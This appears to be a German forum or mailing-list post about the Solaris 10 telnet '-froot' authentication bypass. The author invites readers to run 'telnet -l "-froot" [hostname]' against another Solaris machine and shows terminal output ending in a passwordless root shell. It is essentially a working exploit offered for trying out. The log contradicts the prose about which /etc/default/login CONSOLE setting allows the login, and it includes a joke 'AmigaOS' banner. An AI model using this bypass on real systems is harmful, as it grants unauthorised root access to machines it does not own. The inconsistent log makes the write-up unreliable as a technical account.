Hi,
in der full-disclosure mailing-liste habe ich heute was interessantes gelesen und musste es gleich ausprobieren. und in der tat, es funktioniert bei meiner sol10 buechse. leider habe ich nur eine und die ist noch dazu ohne patches. ich bin mir nicht ganz sicher, aber es koennte solaris10 10/06 sein!? (wenn es das ueberhaupt gibt. wie bekomme ich raus auf welchem 'level' das os sich befindet?)
probiert mal folgendes von einer anderen solaris kiste aus.
telnet -l "-froot" [hostname]
in der /etc/default/login ist die zeile mit der 'Console' nicht kommentiert. somit bekomme ich sofort die meldung, dass ich nicht an der system console bin und mich schleichen soll. anders sieht es aus wenn die zeile kommentiert wird. mit weiteren useraccounts funktioniert es ebenfalls, soweit man die schreibweise des benutzerkontos kennt.
odin~# cat /etc/default/login | grep -i console
# If CONSOLE is set, root can only login on that device.
# CONSOLE=/dev/console
ismine~# telnet -l "-froot" odin
Trying 192.168.2.17...
Connected to odin.wwhsnet.rz-amper.com.
Escape character is '^]'.
Commodore AmigaOS 5.9
Not on system console
Connection to odin.wwhsnet.rz-amper.com closed by foreign host.
odin~# cat /etc/default/login | grep -i console
# If CONSOLE is set, root can only login on that device.
CONSOLE=/dev/console
ismine~# telnet -l "-froot" odin
Trying 192.168.2.17...
Connected to odin.wwhsnet.rz-amper.com.
Escape character is '^]'.
Commodore AmigaOS 5.9
Last login: Tue Nov 28 19:34:50 on console
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
You have fucking new mail.
odin~#
ct,